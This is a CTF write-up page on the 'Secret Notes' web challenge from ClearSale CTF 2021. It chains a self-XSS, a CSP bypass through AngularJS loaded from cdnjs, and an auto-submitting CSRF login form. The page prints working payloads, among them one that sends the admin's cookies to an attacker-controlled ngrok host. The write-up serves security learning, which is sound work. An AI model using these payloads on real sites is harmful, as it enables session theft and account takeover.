💻
0xTen
  • Intro
  • 🚩CTFs
  • Hackthebox👽
    • Boxes
      • Attended
    • Challenges
      • knote
    • Business Ctf
      • 2022
        • Midenios
  • UHC🔮
    • Quals
      • 8th Edition
        • Super Secret Password
        • Trampoline
        • I like to buy or smth
  • pwnable.kr🐱
    • Toddler's Bottle
      • fd
      • bof
      • random
      • uaf
  • Boitatech🐍
    • 2021
      • bankapp
  • DEFCON☠️
    • 2022
      • Quals
        • Smuggler's Cove
  • RealWorld CTF🐉
    • 2022
  • Dice CTF 🎲
    • 2022
      • babyrop
    • 2023
  • Insomnihack💀
    • 2022
  • ClearSale CTF🏆
    • 2021
      • Secret Notes
      • Esse Esse Erre Effe
      • Fresca Soda
      • Healthchecker
  • InCTF🏆
    • 2021
      • Ancient House
  • ASIS CTF🏆
    • 2020
      • Shared house
    • 2021
      • Mini Memo
  • N1CTF🏆
    • 2021
      • babyguess
  • HacktivityCon🏆
    • 2021
      • faucet
      • pawned
      • retcheck
      • shellcoded
      • the library
      • yabo
  • 🖥️Pwn
    • ROP↩️
      • x64 ret2libc
    • Heap⛰️
      • jemalloc
      • Fastbin dup - 2.31
      • Chunk Overlapping - 2.31
      • phoenix
        • heap-zero
          • i486
        • heap-one
          • i486
    • Format strings🩸
      • Blind
    • Kernel🌽
    • Browser🤖
  • 🕸️Web
    • SQLi💉
      • Blind (Boolean Based)
Powered by GitBook
On this page
  • Approaching the app
  • The exploit

Was this helpful?

  1. ClearSale CTF🏆
  2. 2021

Secret Notes

Secret notes was an XSS challenge that consisted on a self xss that could be leveraged through csrf, it was also necessary to bypass CSP.

Previous2021NextEsse Esse Erre Effe

Last updated 3 years ago

Was this helpful?

Approaching the app

The app has two main features, a notepad to which you login to and it links the note to your session, so whenever you login with the same user, you'll see the same note (this may sound obvious but it's kind of the catch here😉).

It's possible to login to the notepad using admin as username and password. Once logged in we receive a CSP header as follows:

Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' cdnjs.cloudflare.com maxcdn.bootstrapcdn.com; style-src maxcdn.bootstrapcdn.com 'self' 'unsafe-inline';

The app won't run simple xss payloads such as <script>alert()</script>, but it does accept anything from cdnjs, that means we could, for example, import angular.js and finaly be able to run javascript. There is an hacktricks article that makes this fairly easy to accomplish.

Running the following payload will pop an alert:

</textarea><script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert("csp bypass ez af");//');}} </div>

The second feature of the app allows you to input an url to which the admin will browse.

The app also doesn't have any CSRF protections at all. With all the info we've gathered, we could send an url that would take the admin to a CSRF payload that would send a login form to the app using the same credentials we did, so the admin will be redirected to our self xss payload.

The exploit

We could try exfiltrating cookies with a payload as follows.

</textarea><script src='https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js'></script>
    <div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };location=`http://d3e1fcf03b4e.ngrok.io/?xss=`+btoa(document.cookie);//');}}</div>

We set the location to a server we control and pass the cookies as a get parameter, this is basic data exfiltration via xss. After storing the xss payload in the notepad, we just need to get the admin to login. This can be done serving the following html form generated with burpsuite (Engagement tools > Generate CSRF POC):

<html>

  <!-- CSRF PoC - generated by Burp Suite Professional -->

  <body>

  <script>history.pushState('', '', '/')</script>

    <form id="form1" action="http://34.135.203.251/login" method="POST">

      <input type="hidden" name="username" value="admin" />

      <input type="hidden" name="password" value="admin" />

    </form>
    <script>
     document.getElementById("form1").submit();
    </script>

  </body>

</html>

Burp suite generates a PoC that requires user interaction, but it can be modded with javascript to run automatically. After sending the CSRF url to the admin, a cookie hits our server.

After decoding the base64 data, we get the flag

😛
Content Security Policy (CSP) BypassHackTricks
Logo